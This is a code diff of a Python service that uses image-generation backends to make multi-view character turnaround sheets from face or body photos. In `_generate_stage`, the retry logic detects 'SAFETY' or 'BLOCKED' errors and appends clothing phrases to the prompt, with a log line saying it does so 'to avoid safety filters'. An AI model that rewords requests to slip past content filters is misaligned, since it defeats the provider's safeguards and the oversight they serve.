7. Right side full body
|
| 50 |
+
8. Composite character sheet
|
| 51 |
+
"""
|
| 52 |
+
|
| 53 |
+
def __init__(
|
| 54 |
+
self,
|
| 55 |
+
api_key: Optional[str] = None,
|
| 56 |
+
use_pro_model: bool = False,
|
| 57 |
+
config: Optional[CharacterSheetConfig] = None,
|
| 58 |
+
backend: Optional[BackendType] = None,
|
| 59 |
+
backend_router: Optional[BackendRouter] = None
|
| 60 |
+
):
|
| 61 |
+
"""
|
| 62 |
+
Initialize character sheet service.
|
| 63 |
+
|
| 64 |
+
Args:
|
| 65 |
+
api_key: Gemini API key (for cloud backends)
|
| 66 |
+
use_pro_model: Use Gemini Pro model (legacy, use backend param instead)
|
| 67 |
+
config: Optional configuration
|
| 68 |
+
backend: Specific backend to use
|
| 69 |
+
backend_router: Pre-configured backend router
|
| 70 |
+
"""
|
| 71 |
+
self.config = config or CharacterSheetConfig()
|
| 72 |
+
|
| 73 |
+
# Determine backend
|
| 74 |
+
if backend_router is not None:
|
| 75 |
+
self.router = backend_router
|
| 76 |
+
self.backend = backend or backend_router.default_backend
|
| 77 |
+
else:
|
| 78 |
+
# Determine default backend based on params
|
| 79 |
+
if backend is not None:
|
| 80 |
+
self.backend = backend
|
| 81 |
+
elif use_pro_model:
|
| 82 |
+
self.backend = BackendType.GEMINI_PRO
|
| 83 |
+
else:
|
| 84 |
+
self.backend = BackendType.GEMINI_FLASH
|
| 85 |
+
|
| 86 |
+
self.router = BackendRouter(
|
| 87 |
+
gemini_api_key=api_key,
|
| 88 |
+
default_backend=self.backend
|
| 89 |
+
)
|
| 90 |
+
|
| 91 |
+
# For backward compatibility
|
| 92 |
+
self.use_pro_model = use_pro_model
|
| 93 |
+
self.client = self.router.get_client(self.backend)
|
| 94 |
+
|
| 95 |
+
logger.info(f"CharacterSheetService initialized (backend: {self.backend.value})")
|
| 96 |
+
|
| 97 |
+
def generate_character_sheet(
|
| 98 |
+
self,
|
| 99 |
+
initial_image: Optional[Image.Image],
|
| 100 |
+
input_type: str = "Face Only",
|
| 101 |
+
character_name: str = "Character",
|
| 102 |
+
gender_term: str = "character",
|
| 103 |
+
costume_description: str = "",
|
| 104 |
+
costume_image: Optional[Image.Image] = None,
|
| 105 |
+
face_image: Optional[Image.Image] = None,
|
| 106 |
+
body_image: Optional[Image.Image] = None,
|
| 107 |
+
include_costume_in_faces: bool = True,
|
| 108 |
+
progress_callback: Optional[Callable[[int, int, str], None]] = None,
|
| 109 |
+
stage_callback: Optional[Callable[[str, Image.Image, Dict[str, Any]], None]] = None,
|
| 110 |
+
output_dir: Optional[Path] = None
|
| 111 |
+
) -> Tuple[Optional[Image.Image], str, Dict[str, Any]]:
|
| 112 |
+
"""
|
| 113 |
+
Generate complete 7-view character turnaround sheet.
|
| 114 |
+
|
| 115 |
+
Args:
|
| 116 |
+
initial_image: Starting image (face or body)
|
| 117 |
+
input_type: "Face Only", "Full Body", or "Face + Body (Separate)"
|
| 118 |
+
character_name: Character name
|
| 119 |
+
gender_term: "character", "man", or "woman"
|
| 120 |
+
costume_description: Text costume description
|
| 121 |
+
costume_image: Optional costume reference
|
| 122 |
+
face_image: Face image (for Face + Body mode)
|
| 123 |
+
body_image: Body image (for Face + Body mode)
|
| 124 |
+
include_costume_in_faces: If True, include costume reference in face views.
|
| 125 |
+
Set False for models like FLUX that confuse costume with framing.
|
| 126 |
+
progress_callback: Optional callback(stage, total_stages, message)
|
| 127 |
+
stage_callback: Optional callback(stage_name, image, stages_dict) called after each
|
| 128 |
+
stage completes with the generated image. Enables streaming preview.
|
| 129 |
+
output_dir: Optional output directory
|
| 130 |
+
|
| 131 |
+
Returns:
|
| 132 |
+
Tuple of (character_sheet, status_message, metadata)
|
| 133 |
+
"""
|
| 134 |
+
try:
|
| 135 |
+
total_stages = 9
|
| 136 |
+
stages = {}
|
| 137 |
+
|
| 138 |
+
logger.info("=" * 60)
|
| 139 |
+
logger.info(f"STARTING CHARACTER SHEET: {character_name}")
|
| 140 |
+
logger.info(f"Input type: {input_type}")
|
| 141 |
+
logger.info(f"Costume: {costume_description or '(none)'}")
|
| 142 |
+
logger.info("=" * 60)
|
| 143 |
+
|
| 144 |
+
# Build costume instructions - separate for face and body views
|
| 145 |
+
# For models like FLUX, costume refs confuse face generation
|
| 146 |
+
costume_instruction_body = ""
|
| 147 |
+
if costume_description:
|
| 148 |
+
costume_instruction_body = f" wearing {costume_description}"
|
| 149 |
+
elif costume_image:
|
| 150 |
+
costume_instruction_body = " wearing the costume shown in the reference"
|
| 151 |
+
|
| 152 |
+
# Face views only get costume instruction if flag is set
|
| 153 |
+
if include_costume_in_faces:
|
| 154 |
+
costume_instruction_face = costume_instruction_body
|
| 155 |
+
else:
|
| 156 |
+
costume_instruction_face = ""
|
| 157 |
+
logger.info("Costume excluded from face views (include_costume_in_faces=False)")
|
| 158 |
+
|
| 159 |
+
def update_progress(stage: int, message: str):
|
| 160 |
+
if progress_callback:
|
| 161 |
+
progress_callback(stage, total_stages, message)
|
| 162 |
+
logger.info(f"[Stage {stage}/{total_stages}] {message}")
|
| 163 |
+
|
| 164 |
+
def notify_stage_complete(stage_name: str, image: Image.Image):
|
| 165 |
+
"""Notify callback when a stage completes for streaming preview."""
|
| 166 |
+
if stage_callback and image is not None:
|
| 167 |
+
stage_callback(stage_name, image, stages)
|
| 168 |
+
|
| 169 |
+
# =================================================================
|
| 170 |
+
# Stage 0: Normalize input
|
| 171 |
+
# =================================================================
|
| 172 |
+
update_progress(0, "Normalizing input images...")
|
| 173 |
+
|
| 174 |
+
reference_body, reference_face = self._normalize_input(
|
| 175 |
+
initial_image=initial_image,
|
| 176 |
+
input_type=input_type,
|
| 177 |
+
face_image=face_image,
|
| 178 |
+
body_image=body_image,
|
| 179 |
+
costume_instruction=costume_instruction_body, # Body normalization uses full costume
|
| 180 |
+
costume_image=costume_image,
|
| 181 |
+
gender_term=gender_term,
|
| 182 |
+
stages=stages,
|
| 183 |
+
progress_callback=lambda msg: update_progress(0, msg)
|
| 184 |
+
)
|
| 185 |
+
|
| 186 |
+
if reference_body is None or reference_face is None:
|
| 187 |
+
return None, "Failed to normalize input images", {}
|
| 188 |
+
|
| 189 |
+
time.sleep(1)
|
| 190 |
+
|
| 191 |
+
# =================================================================
|
| 192 |
+
# FACE VIEWS (3 portraits)
|
| 193 |
+
# =================================================================
|
| 194 |
+
|
| 195 |
+
# Stage 1: Front face portrait
|
| 196 |
+
update_progress(1, "Generating front face portrait...")
|
| 197 |
+
|
| 198 |
+
if input_type == "Face + Body (Separate)":
|
| 199 |
+
prompt = f"Generate a close-up frontal facial portrait showing the {gender_term} from the first image (body/costume reference), extrapolate and extract exact facial details from the second image (face reference). Do NOT transfer clothing or hair style from the second image. The face should fill the entire vertical space, neutral grey background with professional studio lighting."
|
| 200 |
+
input_images = [reference_body, reference_face]
|
| 201 |
+
else:
|
| 202 |
+
prompt = f"Generate a formal portrait view of this {gender_term}{costume_instruction_face} as depicted in the reference images, in front of a neutral grey background with professional studio lighting. The face should fill the entire vertical space. Maintain exact facial features from the reference."
|
| 203 |
+
input_images = [reference_face, reference_body]
|
| 204 |
+
# Only include costume in face views if flag is set (smarter models)
|
| 205 |
+
if costume_image and include_costume_in_faces:
|
| 206 |
+
input_images.append(costume_image)
|
| 207 |
+
|
| 208 |
+
front_face, status = self._generate_stage(
|
| 209 |
+
prompt=prompt,
|
| 210 |
+
input_images=input_images,
|
| 211 |
+
aspect_ratio=self.config.face_aspect_ratio,
|
| 212 |
+
temperature=self.config.face_temperature
|
| 213 |
+
)
|
| 214 |
+
|
| 215 |
+
if front_face is None:
|
| 216 |
+
return None, f"Stage 1 failed: {status}", {}
|
| 217 |
+
|
| 218 |
+
stages['front_face'] = front_face
|
| 219 |
+
notify_stage_complete('front_face', front_face)
|
| 220 |
+
time.sleep(1)
|
| 221 |
+
|
| 222 |
+
# Stage 2: Left face profile
|
| 223 |
+
update_progress(2, "Generating left face profile...")
|
| 224 |
+
|
| 225 |
+
prompt = f"Create a left side profile view (90 degrees) of this {gender_term}'s face{costume_instruction_face}, showing the left side of the face filling the frame. Professional studio lighting against a neutral grey background. Maintain exact facial features from the reference."
|
| 226 |
+
|
| 227 |
+
input_images = [front_face, reference_body]
|
| 228 |
+
if input_type == "Face + Body (Separate)":
|
| 229 |
+
input_images.append(reference_face)
|
| 230 |
+
elif costume_image and include_costume_in_faces:
|
| 231 |
+
# Only include costume in face views if flag is set (smarter models)
|
| 232 |
+
input_images.append(costume_image)
|
| 233 |
+
|
| 234 |
+
left_face, status = self._generate_stage(
|
| 235 |
+
prompt=prompt,
|
| 236 |
+
input_images=input_images,
|
| 237 |
+
aspect_ratio=self.config.face_aspect_ratio,
|
| 238 |
+
temperature=self.config.face_temperature
|
| 239 |
+
)
|
| 240 |
+
|
| 241 |
+
if left_face is None:
|
| 242 |
+
return None, f"Stage 2 failed: {status}", {}
|
| 243 |
+
|
| 244 |
+
stages['left_face'] = left_face
|
| 245 |
+
notify_stage_complete('left_face', left_face)
|
| 246 |
+
time.sleep(1)
|
| 247 |
+
|
| 248 |
+
# Stage 3: Right face profile
|
| 249 |
+
update_progress(3, "Generating right face profile...")
|
| 250 |
+
|
| 251 |
+
prompt = f"Create a right side profile view (90 degrees) of this {gender_term}'s face{costume_instruction_face}, showing the right side of the face filling the frame. Professional studio lighting against a neutral grey background. Maintain exact facial features from the reference."
|
| 252 |
+
|
| 253 |
+
input_images = [front_face, reference_body]
|
| 254 |
+
if input_type == "Face + Body (Separate)":
|
| 255 |
+
input_images.append(reference_face)
|
| 256 |
+
elif costume_image and include_costume_in_faces:
|
| 257 |
+
# Only include costume in face views if flag is set (smarter models)
|
| 258 |
+
input_images.append(costume_image)
|
| 259 |
+
|
| 260 |
+
right_face, status = self._generate_stage(
|
| 261 |
+
prompt=prompt,
|
| 262 |
+
input_images=input_images,
|
| 263 |
+
aspect_ratio=self.config.face_aspect_ratio,
|
| 264 |
+
temperature=self.config.face_temperature
|
| 265 |
+
)
|
| 266 |
+
|
| 267 |
+
if right_face is None:
|
| 268 |
+
return None, f"Stage 3 failed: {status}", {}
|
| 269 |
+
|
| 270 |
+
stages['right_face'] = right_face
|
| 271 |
+
notify_stage_complete('right_face', right_face)
|
| 272 |
+
time.sleep(1)
|
| 273 |
+
|
| 274 |
+
# =================================================================
|
| 275 |
+
# BODY VIEWS (4 views)
|
| 276 |
+
# =================================================================
|
| 277 |
+
|
| 278 |
+
# Stage 4: Front body (use normalized reference)
|
| 279 |
+
update_progress(4, "Using front body from normalized reference...")
|
| 280 |
+
front_body = reference_body
|
| 281 |
+
stages['front_body'] = front_body
|
| 282 |
+
notify_stage_complete('front_body', front_body)
|
| 283 |
+
time.sleep(1)
|
| 284 |
+
|
| 285 |
+
# Stage 5: Back body
|
| 286 |
+
update_progress(5, "Generating back full body...")
|
| 287 |
+
|
| 288 |
+
prompt = f"Generate a rear view image of this {gender_term}{costume_instruction_body} showing the back in a neutral standing pose against a neutral grey background with professional studio lighting. The full body should fill the vertical space. Maintain consistent appearance from the reference images."
|
| 289 |
+
|
| 290 |
+
input_images = [reference_body, front_face]
|
| 291 |
+
if costume_image:
|
| 292 |
+
input_images.append(costume_image)
|
| 293 |
+
|
| 294 |
+
back_body, status = self._generate_stage(
|
| 295 |
+
prompt=prompt,
|
| 296 |
+
input_images=input_images,
|
| 297 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 298 |
+
temperature=self.config.body_temperature
|
| 299 |
+
)
|
| 300 |
+
|
| 301 |
+
if back_body is None:
|
| 302 |
+
return None, f"Stage 5 failed: {status}", {}
|
| 303 |
+
|
| 304 |
+
stages['back_body'] = back_body
|
| 305 |
+
notify_stage_complete('back_body', back_body)
|
| 306 |
+
time.sleep(1)
|
| 307 |
+
|
| 308 |
+
# Stage 6: Left side body
|
| 309 |
+
update_progress(6, "Generating left side full body...")
|
| 310 |
+
|
| 311 |
+
prompt = f"Generate a left side view of the full body of this {gender_term}{costume_instruction_body} in front of a neutral grey background. The {gender_term} should be shown from the left side (90 degree angle) in a neutral standing pose. Full body fills vertical space. Professional studio lighting."
|
| 312 |
+
|
| 313 |
+
input_images = [left_face, front_body, reference_body]
|
| 314 |
+
|
| 315 |
+
left_body, status = self._generate_stage(
|
| 316 |
+
prompt=prompt,
|
| 317 |
+
input_images=input_images,
|
| 318 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 319 |
+
temperature=self.config.body_temperature
|
| 320 |
+
)
|
| 321 |
+
|
| 322 |
+
if left_body is None:
|
| 323 |
+
return None, f"Stage 6 failed: {status}", {}
|
| 324 |
+
|
| 325 |
+
stages['left_body'] = left_body
|
| 326 |
+
notify_stage_complete('left_body', left_body)
|
| 327 |
+
time.sleep(1)
|
| 328 |
+
|
| 329 |
+
# Stage 7: Right side body
|
| 330 |
+
update_progress(7, "Generating right side full body...")
|
| 331 |
+
|
| 332 |
+
prompt = f"Generate a right side view of the full body of this {gender_term}{costume_instruction_body} in front of a neutral grey background. The {gender_term} should be shown from the right side (90 degree angle) in a neutral standing pose. Full body fills vertical space. Professional studio lighting."
|
| 333 |
+
|
| 334 |
+
input_images = [right_face, front_body, reference_body]
|
| 335 |
+
|
| 336 |
+
right_body, status = self._generate_stage(
|
| 337 |
+
prompt=prompt,
|
| 338 |
+
input_images=input_images,
|
| 339 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 340 |
+
temperature=self.config.body_temperature
|
| 341 |
+
)
|
| 342 |
+
|
| 343 |
+
if right_body is None:
|
| 344 |
+
return None, f"Stage 7 failed: {status}", {}
|
| 345 |
+
|
| 346 |
+
stages['right_body'] = right_body
|
| 347 |
+
notify_stage_complete('right_body', right_body)
|
| 348 |
+
time.sleep(1)
|
| 349 |
+
|
| 350 |
+
# =================================================================
|
| 351 |
+
# Stage 8: Composite character sheet
|
| 352 |
+
# =================================================================
|
| 353 |
+
update_progress(8, "Compositing character sheet...")
|
| 354 |
+
|
| 355 |
+
character_sheet = self.composite_character_sheet(
|
| 356 |
+
left_face=left_face,
|
| 357 |
+
front_face=front_face,
|
| 358 |
+
right_face=right_face,
|
| 359 |
+
left_body=left_body,
|
| 360 |
+
front_body=front_body,
|
| 361 |
+
right_body=right_body,
|
| 362 |
+
back_body=back_body
|
| 363 |
+
)
|
| 364 |
+
|
| 365 |
+
stages['character_sheet'] = character_sheet
|
| 366 |
+
|
| 367 |
+
# Build metadata
|
| 368 |
+
metadata = CharacterSheetMetadata(
|
| 369 |
+
character_name=character_name,
|
| 370 |
+
input_type=input_type,
|
| 371 |
+
costume_description=costume_description,
|
| 372 |
+
backend=self.router.get_active_backend_name(),
|
| 373 |
+
stages={
|
| 374 |
+
"left_face": {"size": left_face.size},
|
| 375 |
+
"front_face": {"size": front_face.size},
|
| 376 |
+
"right_face": {"size": right_face.size},
|
| 377 |
+
"left_body": {"size": left_body.size},
|
| 378 |
+
"front_body": {"size": front_body.size},
|
| 379 |
+
"right_body": {"size": right_body.size},
|
| 380 |
+
"back_body": {"size": back_body.size},
|
| 381 |
+
}
|
| 382 |
+
)
|
| 383 |
+
|
| 384 |
+
success_msg = f"Character sheet generated! 7 views of {character_name}"
|
| 385 |
+
|
| 386 |
+
# Save to disk if requested
|
| 387 |
+
if output_dir:
|
| 388 |
+
save_dir = self._save_outputs(
|
| 389 |
+
character_name=character_name,
|
| 390 |
+
stages=stages,
|
| 391 |
+
output_dir=output_dir
|
| 392 |
+
)
|
| 393 |
+
success_msg += f"\nSaved to: {save_dir}"
|
| 394 |
+
|
| 395 |
+
update_progress(9, "Complete!")
|
| 396 |
+
return character_sheet, success_msg, {"metadata": metadata, "stages": stages}
|
| 397 |
+
|
| 398 |
+
except Exception as e:
|
| 399 |
+
logger.exception(f"Character sheet generation failed: {e}")
|
| 400 |
+
return None, f"Error: {str(e)}", {}
|
| 401 |
+
|
| 402 |
+
def _normalize_input(
|
| 403 |
+
self,
|
| 404 |
+
initial_image: Optional[Image.Image],
|
| 405 |
+
input_type: str,
|
| 406 |
+
face_image: Optional[Image.Image],
|
| 407 |
+
body_image: Optional[Image.Image],
|
| 408 |
+
costume_instruction: str,
|
| 409 |
+
costume_image: Optional[Image.Image],
|
| 410 |
+
gender_term: str,
|
| 411 |
+
stages: dict,
|
| 412 |
+
progress_callback: Optional[Callable]
|
| 413 |
+
) -> Tuple[Optional[Image.Image], Optional[Image.Image]]:
|
| 414 |
+
"""Normalize input images to create reference body and face."""
|
| 415 |
+
|
| 416 |
+
if input_type == "Face + Body (Separate)":
|
| 417 |
+
if face_image is None or body_image is None:
|
| 418 |
+
return None, None
|
| 419 |
+
|
| 420 |
+
if progress_callback:
|
| 421 |
+
progress_callback("Normalizing body image...")
|
| 422 |
+
|
| 423 |
+
prompt = f"Front view full body portrait of this person{costume_instruction}, standing, neutral background"
|
| 424 |
+
input_images = [body_image, face_image]
|
| 425 |
+
if costume_image:
|
| 426 |
+
input_images.append(costume_image)
|
| 427 |
+
|
| 428 |
+
normalized_body, _ = self._generate_stage(
|
| 429 |
+
prompt=prompt,
|
| 430 |
+
input_images=input_images,
|
| 431 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 432 |
+
temperature=self.config.normalize_temperature
|
| 433 |
+
)
|
| 434 |
+
|
| 435 |
+
if normalized_body is None:
|
| 436 |
+
return None, None
|
| 437 |
+
|
| 438 |
+
stages['normalized_body'] = normalized_body
|
| 439 |
+
return normalized_body, face_image
|
| 440 |
+
|
| 441 |
+
elif input_type == "Face Only":
|
| 442 |
+
if initial_image is None:
|
| 443 |
+
return None, None
|
| 444 |
+
|
| 445 |
+
if progress_callback:
|
| 446 |
+
progress_callback("Generating full body from face...")
|
| 447 |
+
|
| 448 |
+
prompt = f"Create a full body image of the {gender_term}{costume_instruction} standing in a neutral pose in front of a grey background with professional studio lighting. The {gender_term}'s face and features should match the reference image exactly."
|
| 449 |
+
|
| 450 |
+
input_images = [initial_image]
|
| 451 |
+
if costume_image:
|
| 452 |
+
input_images.append(costume_image)
|
| 453 |
+
|
| 454 |
+
full_body, _ = self._generate_stage(
|
| 455 |
+
prompt=prompt,
|
| 456 |
+
input_images=input_images,
|
| 457 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 458 |
+
temperature=self.config.normalize_temperature
|
| 459 |
+
)
|
| 460 |
+
|
| 461 |
+
if full_body is None:
|
| 462 |
+
return None, None
|
| 463 |
+
|
| 464 |
+
stages['generated_body'] = full_body
|
| 465 |
+
return full_body, initial_image
|
| 466 |
+
|
| 467 |
+
else: # Full Body
|
| 468 |
+
if initial_image is None:
|
| 469 |
+
return None, None
|
| 470 |
+
|
| 471 |
+
# Normalize body
|
| 472 |
+
if progress_callback:
|
| 473 |
+
progress_callback("Normalizing full body...")
|
| 474 |
+
|
| 475 |
+
prompt = f"Front view full body portrait of this person{costume_instruction}, standing, neutral background"
|
| 476 |
+
|
| 477 |
+
input_images = [initial_image]
|
| 478 |
+
if costume_image:
|
| 479 |
+
input_images.append(costume_image)
|
| 480 |
+
|
| 481 |
+
normalized_body, _ = self._generate_stage(
|
| 482 |
+
prompt=prompt,
|
| 483 |
+
input_images=input_images,
|
| 484 |
+
aspect_ratio=self.config.body_aspect_ratio,
|
| 485 |
+
temperature=self.config.normalize_temperature
|
| 486 |
+
)
|
| 487 |
+
|
| 488 |
+
if normalized_body is None:
|
| 489 |
+
return None, None
|
| 490 |
+
|
| 491 |
+
stages['normalized_body'] = normalized_body
|
| 492 |
+
time.sleep(1)
|
| 493 |
+
|
| 494 |
+
# Extract face
|
| 495 |
+
if progress_callback:
|
| 496 |
+
progress_callback("Generating face closeup...")
|
| 497 |
+
|
| 498 |
+
prompt = f"Create a frontal closeup portrait of this {gender_term}'s face{costume_instruction}, focusing only on the face and head. Professional studio lighting against a neutral grey background. The face should fill the entire vertical space. Maintain exact facial features from the reference."
|
| 499 |
+
|
| 500 |
+
input_images = [normalized_body, initial_image]
|
| 501 |
+
if costume_image:
|
| 502 |
+
input_images.append(costume_image)
|
| 503 |
+
|
| 504 |
+
face_closeup, _ = self._generate_stage(
|
| 505 |
+
prompt=prompt,
|
| 506 |
+
input_images=input_images,
|
| 507 |
+
aspect_ratio=self.config.face_aspect_ratio,
|
| 508 |
+
temperature=self.config.face_temperature
|
| 509 |
+
)
|
| 510 |
+
|
| 511 |
+
if face_closeup is None:
|
| 512 |
+
return None, None
|
| 513 |
+
|
| 514 |
+
stages['extracted_face'] = face_closeup
|
| 515 |
+
return normalized_body, face_closeup
|
| 516 |
+
|
| 517 |
+
def _generate_stage(
|
| 518 |
+
self,
|
| 519 |
+
prompt: str,
|
| 520 |
+
input_images: List[Image.Image],
|
| 521 |
+
aspect_ratio: str,
|
| 522 |
+
temperature: float,
|
| 523 |
+
max_retries: int = 3
|
| 524 |
+
) -> Tuple[Optional[Image.Image], str]:
|
| 525 |
+
"""Generate single stage with retry logic."""
|
| 526 |
+
|
| 527 |
+
modified_prompt = prompt
|
| 528 |
+
cfg = self.config
|
| 529 |
+
|
| 530 |
+
# Preprocess images for the current backend
|
| 531 |
+
backend_type = self.backend.value if self.backend else "unknown"
|
| 532 |
+
processed_images = preprocess_images_for_backend(
|
| 533 |
+
input_images, backend_type, aspect_ratio
|
| 534 |
+
)
|
| 535 |
+
logger.info(f"Preprocessed {len(processed_images)} images for {backend_type}")
|
| 536 |
+
|
| 537 |
+
for attempt in range(max_retries):
|
| 538 |
+
try:
|
| 539 |
+
if attempt > 0:
|
| 540 |
+
wait_time = cfg.retry_delay
|
| 541 |
+
logger.info(f"Retry {attempt + 1}/{max_retries}, waiting {wait_time}s...")
|
| 542 |
+
time.sleep(wait_time)
|
| 543 |
+
|
| 544 |
+
request = GenerationRequest(
|
| 545 |
+
prompt=modified_prompt,
|
| 546 |
+
input_images=processed_images,
|
| 547 |
+
aspect_ratio=aspect_ratio,
|
| 548 |
+
temperature=temperature
|
| 549 |
+
)
|
| 550 |
+
|
| 551 |
+
result = self.client.generate(request)
|
| 552 |
+
|
| 553 |
+
if result.success:
|
| 554 |
+
delay = random.uniform(cfg.rate_limit_delay_min, cfg.rate_limit_delay_max)
|
| 555 |
+
time.sleep(delay)
|
| 556 |
+
return result.image, result.message
|
| 557 |
+
|
| 558 |
+
# Check for safety block
|
| 559 |
+
error_upper = result.message.upper()
|
| 560 |
+
if any(kw in error_upper for kw in ['SAFETY', 'BLOCKED', 'PROHIBITED', 'IMAGE_OTHER']):
|
| 561 |
+
if 'wearing' not in modified_prompt.lower():
|
| 562 |
+
if 'body' in modified_prompt.lower():
|
| 563 |
+
modified_prompt = prompt + ", fully clothed in casual wear"
|
| 564 |
+
else:
|
| 565 |
+
modified_prompt = prompt + ", wearing appropriate clothing"
|
| 566 |
+
logger.info("Modified prompt to avoid safety filters")
|
| 567 |
+
|
| 568 |
+
logger.warning(f"Attempt {attempt + 1} failed: {result.message}")
|
| 569 |
+
|
| 570 |
+
except Exception as e:
|
| 571 |
+
logger.error(f"Attempt {attempt + 1} exception: {e}")
|
| 572 |
+
if attempt == max_retries - 1:
|
| 573 |
+
return None, str(e)
|
| 574 |
+
|
| 575 |
+
return None, f"All {max_retries} attempts failed"
|
| 576 |
+
|
| 577 |
+
def composite_character_sheet(
|
| 578 |
+
self,
|
| 579 |
+
left_face: Image.Image,
|
| 580 |
+
front_face: Image.Image,
|
| 581 |
+
right_face: Image.Image,
|
| 582 |
+
left_body: Image.Image,
|
| 583 |
+
front_body: Image.Image,
|
| 584 |
+
right_body: Image.Image,
|
| 585 |
+
back_body: Image.Image
|
| 586 |
+
) -> Image.Image:
|
| 587 |
+
"""
|
| 588 |
+
Composite all 7 views into character sheet.
|
| 589 |
+
|
| 590 |
+
Layout:
|
| 591 |
+
+------------------+------------------+------------------+
|
| 592 |
+
| Left Face Profile| Front Face | Right Face Profile|
|
| 593 |
+
+------------------+------------------+------------------+
|
| 594 |
+
| Left Side Body | Front Body | Right Side Body | Back Body |
|
| 595 |
+
+------------------+------------------+------------------+
|
| 596 |
+
"""
|
| 597 |
+
# Normalize all inputs
|
| 598 |
+
left_face = ensure_pil_image(left_face, "left_face")
|
| 599 |
+
front_face = ensure_pil_image(front_face, "front_face")
|
| 600 |
+
right_face = ensure_pil_image(right_face, "right_face")
|
| 601 |
+
left_body = ensure_pil_image(left_body, "left_body")
|
| 602 |
+
front_body = ensure_pil_image(front_body, "front_body")
|
| 603 |
+
right_body = ensure_pil_image(right_body, "right_body")
|
| 604 |
+
back_body = ensure_pil_image(back_body, "back_body")
|
| 605 |
+
|
| 606 |
+
spacing = self.config.spacing
|
| 607 |
+
|
| 608 |
+
# Calculate dimensions
|
| 609 |
+
face_row_width = left_face.width + front_face.width + right_face.width
|
| 610 |
+
body_row_width = left_body.width + front_body.width + right_body.width + back_body.width
|
| 611 |
+
canvas_width = max(face_row_width, body_row_width)
|
| 612 |
+
canvas_height = front_face.height + spacing + front_body.height
|
| 613 |
+
|
| 614 |
+
# Create canvas
|
| 615 |
+
canvas = Image.new('RGB', (canvas_width, canvas_height), color=self.config.background_color)
|
| 616 |
+
|
| 617 |
+
# Upper row: 3 face portraits
|
| 618 |
+
x = 0
|
| 619 |
+
canvas.paste(left_face, (x, 0))
|
| 620 |
+
x += left_face.width
|
| 621 |
+
canvas.paste(front_face, (x, 0))
|
| 622 |
+
x += front_face.width
|
| 623 |
+
canvas.paste(right_face, (x, 0))
|
| 624 |
+
|
| 625 |
+
# Lower row: 4 body views
|
| 626 |
+
x = 0
|
| 627 |
+
y = front_face.height + spacing
|
| 628 |
+
canvas.paste(left_body, (x, y))
|
| 629 |
+
x += left_body.width
|
| 630 |
+
canvas.paste(front_body, (x, y))
|
| 631 |
+
x += front_body.width
|
| 632 |
+
canvas.paste(right_body, (x, y))
|
| 633 |
+
x += right_body.width
|
| 634 |
+
canvas.paste(back_body, (x, y))
|
| 635 |
+
|
| 636 |
+
return canvas
|
| 637 |
+
|
| 638 |
+
def extract_views_from_sheet(
|
| 639 |
+
self,
|
| 640 |
+
character_sheet: Image.Image
|
| 641 |
+
) -> Dict[str, Image.Image]:
|
| 642 |
+
"""
|
| 643 |
+
Extract individual views from character sheet.
|
| 644 |
+
|
| 645 |
+
Returns:
|
| 646 |
+
Dictionary with 7 extracted views
|
| 647 |
+
"""
|
| 648 |
+
sheet_width, sheet_height = character_sheet.size
|
| 649 |
+
spacing = self.config.spacing
|
| 650 |
+
|
| 651 |
+
# Find separator by scanning for dark bar
|
| 652 |
+
scan_start = sheet_height // 3
|
| 653 |
+
scan_end = (2 * sheet_height) // 3
|
| 654 |
+
|
| 655 |
+
min_brightness = 255
|
| 656 |
+
separator_y = scan_start
|
| 657 |
+
|
| 658 |
+
for y in range(scan_start, scan_end):
|
| 659 |
+
line = character_sheet.crop((0, y, min(200, sheet_width), y + 1))
|
| 660 |
+
pixels = list(line.getdata())
|
| 661 |
+
avg_brightness = sum(
|
| 662 |
+
sum(p[:3]) / 3 if isinstance(p, tuple) else p
|
| 663 |
+
for p in pixels
|
| 664 |
+
) / len(pixels)
|
| 665 |
+
|
| 666 |
+
if avg_brightness < min_brightness:
|
| 667 |
+
min_brightness = avg_brightness
|
| 668 |
+
separator_y = y
|
| 669 |
+
|
| 670 |
+
face_height = separator_y
|
| 671 |
+
body_start_y = separator_y + spacing
|
| 672 |
+
body_height = sheet_height - body_start_y
|
| 673 |
+
|
| 674 |
+
# Calculate widths from aspect ratios
|
| 675 |
+
face_width = (face_height * 3) // 4
|
| 676 |
+
body_width = (body_height * 9) // 16
|
| 677 |
+
|
| 678 |
+
# Extract views
|
| 679 |
+
views = {
|
| 680 |
+
'left_face': character_sheet.crop((0, 0, face_width, face_height)),
|
| 681 |
+
'front_face': character_sheet.crop((face_width, 0, 2 * face_width, face_height)),
|
| 682 |
+
'right_face': character_sheet.crop((2 * face_width, 0, 3 * face_width, face_height)),
|
| 683 |
+
'left_body': character_sheet.crop((0, body_start_y, body_width, body_start_y + body_height)),
|
| 684 |
+
'front_body': character_sheet.crop((body_width, body_start_y, 2 * body_width, body_start_y + body_height)),
|
| 685 |
+
'right_body': character_sheet.crop((2 * body_width, body_start_y, 3 * body_width, body_start_y + body_height)),
|
| 686 |
+
'back_body': character_sheet.crop((3 * body_width, body_start_y, 4 * body_width, body_start_y + body_height)),
|
| 687 |
+
}
|
| 688 |
+
|
| 689 |
+
return views
|
| 690 |
+
|
| 691 |
+
def _save_outputs(
|
| 692 |
+
self,
|
| 693 |
+
character_name: str,
|
| 694 |
+
stages: dict,
|
| 695 |
+
output_dir: Path
|
| 696 |
+
) -> Path:
|
| 697 |
+
"""Save all outputs to directory."""
|
| 698 |
+
output_dir = Path(output_dir)
|
| 699 |
+
safe_name = sanitize_filename(character_name)
|
| 700 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 701 |
+
char_dir = output_dir / f"{safe_name}_{timestamp}"
|
| 702 |
+
char_dir.mkdir(parents=True, exist_ok=True)
|
| 703 |
+
|
| 704 |
+
for name, image in stages.items():
|
| 705 |
+
if isinstance(image, Image.Image):
|
| 706 |
+
save_image(image, char_dir, f"{safe_name}_{name}")
|
| 707 |
+
|
| 708 |
+
logger.info(f"Saved outputs to: {char_dir}")
|
| 709 |
+
return char_dir
|
src/comfyui_client.py
ADDED
|
@@ -0,0 +1,578 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
